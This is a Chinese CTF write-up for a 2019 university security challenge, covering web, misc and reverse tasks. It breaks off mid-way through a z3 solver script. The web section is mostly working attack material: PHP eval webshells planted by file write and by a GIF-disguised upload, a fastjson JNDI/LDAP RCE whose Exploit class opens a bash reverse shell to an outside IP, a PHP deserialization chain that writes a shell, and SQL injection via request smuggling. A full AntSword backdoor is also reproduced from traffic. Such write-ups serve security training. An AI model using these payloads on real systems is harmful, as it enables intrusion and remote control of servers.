2019 高校网络信息安全管理运维挑战赛 部分题解

这个幼儿园也太牛逼了。

Web

ezbypass

直接写个🐎。

/?cmd=file_put_contents("/tmp/south.php","<?php eval(\$_POST['south']);?>");

然后蚁剑右键绕过disable_function。

flag{bypass_disable_function_by_Nday_9e0c14fbba82b37}

ezjava

没啥好说的，fastjson-1.2.47-RCE漏洞复现。

修改Exploit.java。

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/123.123.123.123/7777 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

编译后启用服务。

java - marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://123123123/#Exploit
python -m SimpleHTTPServer 80
nc -lvvp 7777

然后发送Payload。

POST /ezjava/ HTTP/1.1
Host: 111.186.57.123:10301
Content-Length: 193
Cache-Control: max-age=0
Origin: http://111.186.57.123:10301
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://111.186.57.123:10301/ezjava/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6074c295e31bd370d9c8839b0ea19491
Connection: close

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://123.123.123.123:1389/Exploit","autoCommit":true}}}

监听到反弹Shell。

flag{jndi_injection_by_ldap_3232}

ezupload

提示了login.php.swp，看了一下，发送空用户名不发送密码就可以绕过。

http://111.186.57.61:10501/
username=south

上🐴，修改文件头为GIF89a，后缀名为phtml。

POST /upload.php HTTP/1.1
Host: 111.186.57.123:10501
Content-Length: 227
Cache-Control: max-age=0
Origin: http://111.186.57.123:10501
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAJC3JWBX6v0GXTQe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://111.186.57.123:10501/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6074c295e31bd370d9c8839b0ea19491
Connection: close

------WebKitFormBoundaryAJC3JWBX6v0GXTQe
Content-Disposition: form-data; name="avatar"; filename="south.phtml"
Content-Type: image/jpeg

GIF89a
<?php
eval($_POST['south']);
?>

------WebKitFormBoundaryAJC3JWBX6v0GXTQe--

得到flag{logical_bypass_not_weak_password}。

ezpop

<?php
error_reporting(0);

class A{

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents)
    {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage()
    {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save()
    {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct()
    {
        if (! $this->autosave) {
            $this->save();
        }
    }
}

class B{

    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

/?src=&data=O:1:"A":4:{s:8:"*store";O:1:"B":1:{s:7:"options";a:3:{s:6:"prefix";s:69:"php://filter/write=convert.base64-decode/resource=./uploads/south.php";s:9:"serialize";s:13:"base64_decode";s:13:"data_compress";i:0;}}s:6:"*key";s:0:"";s:9:"*expire";i:1;s:5:"cache";a:1:{s:72:"111111111111UEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiSjNOdmRYUm9KMTBwT3o4KzU1Q0E=";a:0:{}}}

ezwaf

HTTP走私。

POST /?src=&age=1%20or%20if(1=1,sleep(1),10) HTTP/1.1
Host: 111.186.57.43:10601
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)	 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 5
Content-Length: 5

num=1

Misc

misc2

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from flask import request
from flask import Flask

secret = open('/flag', 'rb')
os.remove('/flag')
app = Flask(__name__)
app.secret_key = '015b9efef8f51c00bcba57ca8c56d77a'


@app.route('/')
def index():
    return open(__file__).read()


@app.route("/r", methods=['POST'])
def r():
    data = request.form["data"]
    if os.path.exists(data):
        return open(data).read()
    return ''


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=False)

文件描述符里翻到了。

http://111.186.57.61:10701/r
data=/dev/fd/3

# flag{2315341f040f45ed02d8315f0a0b28f9}

misc3

下载后打开，有一段。

‌​​‌‌​​‌‌​​‌​​‌‌‌​​‌‌‌‌​‌​​‌‌​​​‌​​​​‌​​‌​​‌‌​‌​‌‌​​‌‌​‌‌​​‌‌‌‌​‌‌​​​‌‌​‌​​‌‌‌​​‌‌​​​‌‌‌‌​​‌‌‌​‌‌‌​​‌‌‌​‌‌​​‌‌‌​‌‌​​‌​​​‌‌​​‌​‌​‌​​‌‌​‌​‌‌​​‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌‌​‌‌‌​​‌‌‌​‌​​‌‌​​‌‌‌​​​‌‌‌‌‌​​‌​‌​‌‌​​​‌‌​‌‌​​‌‌​​‌​​‌‌‌​‌‌​​‌‌‌​​‌‌​​​‌‌‌‌‌​​‌​‌​‌​​‌‌‌​‌‌​​‌‌​​‌‌‌​​​‌‌​‌‌​​‌‌​​‌‌​​​‌‌​‌​​​​​‌​

zwnj改为0以及#8203改为1，转字符串。

res = "‌​​‌‌​​‌‌​​‌​​‌‌‌​​‌‌‌‌​‌​​‌‌​​​‌​​​​‌​​‌​​‌‌​‌​‌‌​​‌‌​‌‌​​‌‌‌‌​‌‌​​​‌‌​‌​​‌‌‌​​‌‌​​​‌‌‌‌​​‌‌‌​‌‌‌​​‌‌‌​‌‌​​‌‌‌​‌‌​​‌​​​‌‌​​‌​‌​‌​​‌‌​‌​‌‌​​‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌‌​‌‌‌​​‌‌‌​‌​​‌‌​​‌‌‌​​​‌‌‌‌‌​​‌​‌​‌‌​​​‌‌​‌‌​​‌‌​​‌​​‌‌‌​‌‌​​‌‌‌​​‌‌​​​‌‌‌‌‌​​‌​‌​‌​​‌‌‌​‌‌​​‌‌​​‌‌‌​​​‌‌​‌‌​​‌‌​​‌‌​​​‌‌​‌​​​​​‌​".replace('‌', '0').replace('​', '1')
print str(hex(int(res, 2)))[2:-1].decode('hex')

# flag{e2a9c8b1175e66cf21f8593bc85bf939}

webshell

流量分析，得到后门。

<?php

@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{
    @session_start();
    $key = 'f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}

;;
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "0897d";
    echo @asenc($output);
    echo "60c97";
}

ob_start();
try {
    $p = base64_decode($_POST["0xc461e86196f1a"]);
    $s = base64_decode($_POST["0x9ec3fa98a283f"]);
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    $r = "{$p} {$c}";
    function fe($f)
    {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    }

    ;
    function runcmd($c)
    {
        $ret = 0;
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join("
", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } else {
            $ret = 127;
        }
        return $ret;
    }

    ;
    $ret = @runcmd($r . " 2>&1");
    print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

然后解出aes加密后的数据。

<?php

function deenc($out)
{
    @session_start();
    $key = 'f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_decode(openssl_decrypt(base64_decode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}

$enc = "kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5";

echo deenc($enc);

# flag{AntSword_is_Powerful_3222222!!!!}

twocats

盲水印，随便找个脚本解得。

Reserve

re1

bi = [0xAB, 0xB3, 0x01, 0xEE, 0x11, 0x07, 0x15, 0x6D, 0x5F, 0x93, 0x15, 0x25, 0x5C, 0x5A, 0x69, 0x78, 0xFF, 0xE1, 0x5F,
      0xD7, 0x25, 0x10, 0x13, 0x71, 0x74, 0xBF, 0x19, 0x16, 0x5F, 0x5E, 0x30, 0x7F]
bi = bi[16:]

for i in range(0, len(bi) / 2):
    temp = bi[i]
    bi[i] = bi[16 - i - 1]
    bi[16 - i - 1] = temp

key = [0x15, 0xE3, 0xF5, 0xCA, 0x31, 0x99, 0xA8, 0x72, 0x01, 0x62, 0xD1, 0x8F, 0x37, 0x1D, 0x92, 0xCB, 0x5F, 0x44, 0x10,
       0xD9, 0x45, 0x79, 0x52, 0xC1, 0x9E, 0xFA, 0x50, 0xE1, 0x5D, 0xCF, 0x58, 0x9D, 0xB2, 0xC0, 0x55, 0xB8, 0x63, 0xF6,
       0x6F, 0xEA, 0xCE, 0x68, 0x0C, 0xFF, 0x59, 0x43, 0x6A, 0x02, 0x65, 0x86, 0x6E, 0xCD, 0x78, 0x07, 0x57, 0x35, 0x41,
       0x5E, 0xFB, 0x8E, 0x7D, 0xB4, 0x70, 0x33, 0x88, 0xAD, 0xBE, 0xA0, 0xB9, 0x93, 0x2D, 0xCC, 0x1F, 0x39, 0x4F, 0xF8,
       0x7B, 0x1C, 0xC5, 0xA6, 0x67, 0x76, 0xAA, 0x27, 0x3E, 0xAB, 0x3B, 0x3C, 0x6B, 0xE8, 0xAE, 0xFE, 0xC6, 0x64, 0x61,
       0x05, 0xD0, 0x4E, 0x54, 0xD4, 0x8B, 0x0B, 0xBF, 0xAF, 0x80, 0x9F, 0x03, 0xF1, 0x1E, 0xDA, 0x46, 0xA3, 0x16, 0xBA,
       0xA9, 0xB0, 0xE9, 0x9A, 0x0E, 0x12, 0x71, 0xC8, 0x2E, 0x49, 0x60, 0x20, 0x4C, 0x0A, 0x2A, 0x18, 0x2C, 0x83, 0xBB,
       0x95, 0x17, 0xDE, 0xEF, 0xE0, 0xDD, 0x21, 0x4B, 0x48, 0xD2, 0x51, 0x04, 0x90, 0x91, 0x82, 0x6D, 0x3D, 0xD6, 0xFC,
       0xFD, 0xC2, 0x56, 0x25, 0x14, 0x23, 0x42, 0xF4, 0xDB, 0xD3, 0x75, 0x32, 0x1A, 0x24, 0x34, 0x0D, 0x5C, 0xA5, 0xE7,
       0x36, 0xF9, 0x19, 0x38, 0xC4, 0xBC, 0x96, 0xB3, 0x06, 0xA7, 0xC9, 0xF3, 0x7A, 0xF2, 0xDF, 0xE6, 0x69, 0x81, 0xEB,
       0x9C, 0x40, 0x85, 0x26, 0x97, 0xB1, 0x11, 0xD7, 0x5B, 0x94, 0x73, 0x84, 0x74, 0x89, 0xEC, 0x0F, 0x7E, 0x22, 0x6C,
       0x3F, 0x87, 0xAC, 0xA1, 0x66, 0x1B, 0xE2, 0x13, 0x9B, 0x8C, 0xA2, 0xD5, 0x2F, 0x4D, 0x00, 0x98, 0xB5, 0x7F, 0x47,
       0xD8, 0x28, 0x8D, 0x2B, 0xEE, 0x08, 0xF7, 0x3A, 0x53, 0x7C, 0xE5, 0xF0, 0xC7, 0xBD, 0x09, 0x77, 0x4A, 0xB7, 0x30,
       0xED, 0x5A, 0xDC, 0xC3, 0xB6, 0xA4, 0x29, 0xE4]

v6 = 0
v7 = 0

for i in range(0, len(bi)):
    v6 += 1
    v7 += key[v6]
    v7 &= 0xff
    temp = key[v6]
    key[v6] = key[v7]
    key[v7] = temp
    print "\b" + chr(key[(key[v6] + key[v7]) & 0xff] ^ bi[i]),

# s1mple_trick_233

re2

打开z3解。

from z3 import *

a0 = Int('a0')
a1 = Int('a1')
a2 = Int('a2')
a3 = Int('a3')
a4 = Int('a4')
a5 = Int('a5')
a6 = Int('a6')
a7 = Int('a7')
a8 = Int('a8')
a9 = Int('a9')
a10 = Int('a10')
a11 = Int('a11')
a12 = Int('a12')
a13 = Int('a13')
a14 = Int('a14')
a15 = Int('a15')
a16 = Int('a16')
a17 = Int('a17')
a18 = Int('a18')
a19 = Int('a19')
a20 = Int('a20')
a21 = Int('a21')
a22 = Int('a22')
a23 = Int('a23')
a24 = Int('a24')
a25 = Int('a25')
a26 = Int('a26')
a27 = Int('a27')
a28 = Int('a28')
a29 = Int('a29')
a30 = Int('a30')
a31 = Int('a31')
s = Solver()
s.add(
    37027 * a30 + 50244 * a28 + 37157 * a27 + 58180 * a24 + 1513 * a23 + 39390 * a22 + 29470 * a19 + 44970 * a18 + 48734 * a16 + 2139 * a15 + 45204 * a11 + 35081 * a10 + 39591 * a9 + 47551 * a7 + 20069 * a6 + 45266 * a5 + 22432 * a4 + 44493 * a0 - 326 * a1 - 57451 * a2 - 18424 * a3 - 3751 * a8 - 6984 * a12 - 9410 * a13 - 54261 * a14 - 62111 * a17 - 20305 * a20 - 33120 * a21 - 11160 * a25 - 24198 * a26 - 1646 * a29 - 13318 * a31 == 34771791)
s.add(
    12535 * a30 + 50109 * a25 + 48594 * a22 + 11260 * a21 + 51548 * a20 + 26720 * a18 + 9187 * a16 + 28702 * a14 + 9624 * a13 + 21730 * a11 + 46114 * a9 + 32499 * a8 + 11900 * a5 + 22008 * a4 + 48560 * a2 + -54741 * a0 - 3606 * a1 - 45416 * a3 - 24275 * a6 - 64371 * a7 - 25714 * a10 - 56673 * a12 - 39430 * a15 - 35779 * a17 - 15144 * a19 - 45050 * a23 - 59016 * a24 - 29262 * a26 - 55650 * a27 - 29492 * a28 - 13828 * a29 + 40522 * a31 == -9451883)
s.add(
    12097 * a30 + 57988 * a28 + 52683 * a27 + 31675 * a26 + 57822 * a25 + 29817 * a22 + 53780 * a21 + 3541 * a20 + 20331 * a19 + 32755 * a16 + 43681 * a15 + 20144 * a14 + 2665 * a11 + 64858 * a10 + 63538 * a9 + 19362 * a7 + 5819 * a5 + 15266 * a4 + 54532 * a3 + 17703 * a0 - 16114 * a1 - 24359 * a2 - 33999 * a6 - 58904 * a8 - 11844 * a12 - 29623 * a13 - 42532 * a17 - 60912 * a18 - 4711 * a23 - 56853 * a24 - 33486 * a29 + 24590 * a31 == 29782736)
s.add(
    51792 * a30 + 36741 * a29 + 32393 * a28 + 59561 * a27 + 48151 * a18 + 37522 * a17 + 28232 * a15 + 2783 * a12 + 28 * a11 + 27013 * a10 + 24960 * a9 + 42702 * a7 + 17219 * a5 + 41149 * a4 + 3430 * a3 + 24247 * a0 + 64898 * a1 - 24733 * a2 - 16545 * a6 - 1315 * a8 - 15867 * a13 - 12126 * a14 - 3823 * a16 - 20727 * a19 - 12037 * a20 - 9347 * a21 - 39338 * a22 - 50524 * a23 - 38675 * a24 - 26114 * a25 - 4975 * a26 - 24297 * a31 == 27959979)
s.add(
    64702 * a30 + 13289 * a29 + 25143 * a28 + 35562 * a26 + 54655 * a25 + 26782 * a21 + 3079 * a19 + 52035 * a18 + 62825 * a17 + 57738 * a16 + 5380 * a15 + 64221 * a12 + 41251 * a8 + 15294 * a2 + -32261 * a0 - 54551 * a1 - 61664 * a3 - 40648 * a4 - 12277 * a5 - 55300 * a6 - 63212 * a7 - 45548 * a9 - 22362 * a10 - 32993 * a11 - 43046 * a13 - 40770 * a14 - 7119 * a20 - 36194 * a22 - 56102 * a23 - 19468 * a24 - 59856 * a27 + 23822 * a31 == -10644544)
s.add(
    5977 * a30 + 63681 * a24 + 6461 * a23 + 43924 * a19 + 9886 * a18 + 22558 * a17 + 8314 * a16 + 47577 * a14 + 43847 * a13 + 32583 * a10 + 30627 * a8 + 47843 * a7 + 33702 * a3 + 60965 * a2 + -9407 * a0 + 64048 * a1 - 12654 * a4 - 56126 * a5 - 47366 * a6 - 29056 * a9 - 50822 * a11 - 6240 * a12 - 12371 * a15 - 23282 * a20 - 13137 * a21 - 13716 * a22 - 43391 * a25 - 37217 * a26 - 43714 * a27 - 55909 * a28 - 62806 * a29 + 36688 * a31 == 230179)
s.add(
    26401 * a30 + 49426 * a29 + 13407 * a28 + 58093 * a27 + 44955 * a26 + 36904 * a25 + 5856 * a23 + 47030 * a22 + 23917 * a20 + 40389 * a18 + 46343 * a16 + 63390 * a14 + 54218 * a9 + 16024 * a8 + 44459 * a6 + 57144 * a5 + 2565 * a4 + 20301 * a2 + -23136 * a0 + 47281 * a1 - 61441 * a3 - 31365 * a7 - 56894 * a10 - 52977 * a11 - 39404 * a12 - 63477 * a13 - 22773 * a15 - 50258 * a17 - 25970 * a19 - 56685 * a21 - 55893 * a24 - 25199 * a31 == 15871572)
s.add(
    22198 * a27 + 41681 * a26 + 53436 * a25 + 11269 * a24 + 15201 * a23 + 14952 * a21 + 58351 * a20 + 1742 * a18 + 7881 * a16 + 18373 * a15 + 50053 * a13 + 3911 * a11 + 15341 * a10 + 42663 * a6 + 22400 * a4 + 4696 * a3 + 18654 * a2 + 62577 * a0 + 23069 * a1 - 16178 * a5 - 34941 * a7 - 50803 * a8 - 28229 * a9 - 45565 * a12 - 45774 * a14 - 28140 * a17 - 29986 * a19 - 40067 * a22 - 63863 * a28 - 50393 * a29 - 14615 * a30 + 16722 * a31 == 12844672)
s.add(
    17326 * a30 + 5750 * a27 + 34037 * a25 + 40581 * a24 + 35119 * a22 + 29560 * a21 + 54431 * a17 + 40135 * a14 + 7362 * a11 + 31888 * a10 + 37963 * a3 + 910 * a2 + -39728 * a0 + 57392 * a1 - 2274 * a4 - 61995 * a5 - 43938 * a6 - 12412 * a7 - 10642 * a8 - 10303 * a9 - 16356 * a12 - 615 * a13 - 11314 * a15 - 17185 * a16 - 61134 * a18 - 4620 * a19 - 4591 * a20 - 51958 * a23 - 65066 * a26 - 6232 * a28 - 60002 * a29 + 30503 * a31 == -7906855)
s.add(
    31106 * a29 + 2313 * a25 + 32582 * a24 + 61335 * a19 + 50686 * a16 + 27537 * a15 + 58190 * a13 + 25366 * a12 + 56260 * a11 + 6483 * a10 + 61315 * a6 + 48180 * a2 + -16296 * a0 - 8786 * a1 - 65236 * a3 - 48383 * a4 - 32713 * a5 - 58771 * a7 - 47593 * a8 - 14512 * a9 - 60203 * a14 - 7295 * a17 - 3885 * a18 - 39212 * a20 - 40687 * a21 - 19258 * a22 - 57463 * a23 - 24504 * a26 - 11629 * a27 - 8917 * a28 - 4535 * a30 + 38212 * a31 == -5359162)
s.add(
    33683 * a28 + 48721 * a27 + 59096 * a26 + 17103 * a25 + 13203 * a24 + 51928 * a23 + 33264 * a22 + 39538 * a20 + 30153 * a18 + 35247 * a16 + 528 * a15 + 6847 * a13 + 18706 * a12 + 35320 * a11 + 3265 * a10 + 11413 * a9 + 51102 * a7 + 39253 * a6 + 63683 * a5 + 25689 * a3 + -31610 * a0 + 52623 * a1 - 35005 * a2 - 9320 * a4 - 16508 * a8 - 55110 * a14 - 63180 * a17 - 13666 * a19 - 49046 * a21 - 42949 * a29 - 60950 * a30 + 26096 * a31 == 34815239)
s.add(
    49588 * a30 + 61328 * a28 + 5176 * a23 + 50390 * a22 + 21307 * a21 + 46709 * a20 + 28722 * a19 + 3656 * a17 + 15786 * a16 + 21116 * a15 + 49637 * a14 + 45466 * a12 + 30791 * a10 + 59808 * a9 + 15859 * a8 + 6146 * a7 + 47557 * a0 + 52902 * a1 - 12806 * a2 - 59773 * a3 - 9182 * a4 - 57417 * a5 - 18447 * a6 - 54963 * a11 - 61599 * a13 - 18454 * a18 - 30277 * a24 - 25544 * a25 - 17882 * a26 - 25149 * a27 - 17363 * a29 + 21848 * a31 == 23582278)
s.add(
    18191 * a30 + 58284 * a27 + 4680 * a25 + 42417 * a24 + 36604 * a20 + 54770 * a19 + 33925 * a15 + 45365 * a13 + 12457 * a12 + 38339 * a11 + 42505 * a9 + 29438 * a8 + 60503 * a7 + 5104 * a4 + 59129 * a3 + 37688 * a0 + 23309 * a1 - 2616 * a2 - 12561 * a5 - 3215 * a6 - 49703 * a10 - 15471 * a14 - 23447 * a16 - 50859 * a17 - 86 * a18 - 3773 * a21 - 9573 * a22 - 25835 * a23 - 20107 * a26 - 45915 * a28 - 56171 * a29 + 29164 * a31 == 30273764)
s.add(
    64657 * a30 + 49705 * a27 + 5149 * a26 + 16127 * a25 + 29867 * a22 + 50998 * a21 + 13714 * a19 + 18867 * a14 + 19385 * a13 + 38458 * a11 + 12962 * a10 + 24700 * a9 + 50206 * a5 + 56918 * a3 + 20452 * a0 + 18062 * a1 - 56424 * a2 - 10457 * a4 - 12288 * a6 - 54591 * a7 - 44777 * a8 - 52078 * a12 - 9805 * a15 - 48011 * a16 - 27363 * a17 - 20890 * a18 - 788 * a20 - 7954 * a23 - 34056 * a24 - 34732 * a28 - 54092 * a29 + 35416 * a31 == 7501764)
s.add(
    44968 * a30 + 41644 * a26 + 24333 * a25 + 40656 * a23 + 37330 * a22 + 52431 * a20 + 18903 * a19 + 42329 * a16 + 40645 * a13 + 0x1FFF * a8 + 21330 * a5 + 1951 * a2 + -39611 * a0 + 25246 * a1 - 37145 * a3 - 3824 * a4 - 49145 * a6 - 43603 * a7 - 60671 * a9 - 53032 * a10 - 48392 * a11 - 15417 * a12 - 13059 * a14 - 58653 * a15 - 51631 * a17 - 50173 * a18 - 44904 * a21 - 34380 * a24 - 18100 * a27 - 57765 * a28 - 64534 * a29 - 26760 * a31 == -35816639)
s.add(
    28579 * a30 + 34688 * a29 + 29438 * a27 + 44211 * a24 + 57593 * a21 + 7046 * a19 + 39526 * a18 + 17545 * a17 + 61374 * a16 + 15405 * a15 + 30392 * a14 + 19579 * a12 + 47959 * a11 + 23926 * a9 + 43929 * a5 + 53538 * a3 + 45166 * a2 + -39824 * a0 + 44401 * a1 - 2540 * a4 - 54452 * a6 - 11199 * a7 - 19801 * a8 - 13592 * a10 - 29922 * a13 - 34144 * a20 - 5305 * a22 - 46917 * a23 - 4511 * a25 - 23881 * a26 - 39081 * a28 + 3296 * a31 == 30983928)
s.add(
    40454 * a30 + 64380 * a29 + 41415 * a27 + 8487 * a22 + 49381 * a19 + 7959 * a18 + 36587 * a16 + 24510 * a15 + 6928 * a14 + 60087 * a7 + 59815 * a5 + 15203 * a2 + 62215 * a0 + 19566 * a1 - 30340 * a3 - 15964 * a4 - 13939 * a6 - 43008 * a8 - 44925 * a9 - 49239 * a10 - 40498 * a11 - 54453 * a12 - 33557 * a13 - 24721 * a17 - 21456 * a20 - 40311 * a21 - 61111 * a23 - 18918 * a24 - 33393 * a25 - 9301 * a26 - 61619 * a28 + 58498 * a31 == -4472687)
s.add(
    2766 * a29 + 14305 * a28 + 10809 * a26 + 6578 * a24 + 53612 * a23 + 36333 * a21 + 30380 * a20 + 3633 * a19 + 35027 * a18 + 62097 * a15 + 39085 * a14 + 21483 * a13 + 43131 * a11 + 5725 * a9 + 40291 * a8 + 63291 * a5 + 57560 * a4 + 40977 * a3 + 33894 * a2 + 35423 * a0 - 12994 * a1 - 32256 * a6 - 23534 * a7 - 40660 * a10 - 19119 * a12 - 33732 * a16 - 63756 * a17 - 13528 * a22 - 47605 * a25 - 43202 * a27 - 42819 * a30 - 34232 * a31 == 18523534)
s.add(
    48054 * a29 + 27903 * a28 + 44427 * a27 + 26215 * a26 + 10136 * a25 + 62674 * a20 + 31419 * a19 + 13647 * a18 + 19761 * a15 + 34155 * a11 + 26302 * a7 + 27559 * a6 + 53130 * a5 + 27162 * a4 + 55103 * a3 + 58838 * a2 + 44942 * a0 + 63420 * a1 - 24313 * a8 - 42499 * a9 - 21629 * a10 - 2633 * a12 - 55014 * a13 - 22926 * a14 - 305 * a16 - 63708 * a17 - 32334 * a21 - 47684 * a22 - 54226 * a23 - 50848 * a24 - 15102 * a30 - 22362 * a31 == 20982750)
s.add(
    59525 * a30 + 23936 * a28 + 61587 * a27 + 4221 * a26 + 55552 * a25 + 13058 * a24 + 45781 * a15 + 65438 * a14 + 51231 * a13 + 33875 * a11 + 6137 * a8 + 62261 * a6 + 46559 * a4 + 26426 * a3 + 9153 * a2 + 6300 * a0 - 30549 * a1 - 55683 * a5 - 44433 * a7 - 46194 * a9 - 57198 * a10 - 45266 * a12 - 6605 * a16 - 43397 * a17 - 7672 * a18 - 48485 * a19 - 54035 * a20 - 12567 * a21 - 47051 * a22 - 62256 * a23 - 9828 * a29 + 50225 * a31 == 5070455)
s.add(
    39286 * a30 + 13236 * a29 + 42884 * a24 + 12704 * a23 + 53136 * a22 + 47722 * a19 + 30422 * a18 + 10481 * a17 + 55058 * a16 + 63967 * a15 + 8353 * a11 + 62270 * a10 + 12090 * a9 + 14796 * a4 + 59059 * a3 + 5686 * a2 + -28415 * a0 + 36297 * a1 - 11307 * a5 - 57251 * a6 - 29507 * a7 - 41415 * a8 - 24476 * a12 - 41751 * a13 - 46589 * a14 - 55870 * a20 - 6321 * a21 - 34350 * a25 - 32922 * a26 - 64909 * a27 - 50870 * a28 + 49349 * a31 == 3066924)
s.add(
